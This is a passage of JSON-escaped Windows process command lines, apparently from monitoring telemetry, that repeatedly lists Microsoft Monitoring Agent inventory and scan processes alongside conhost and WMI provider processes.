Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe 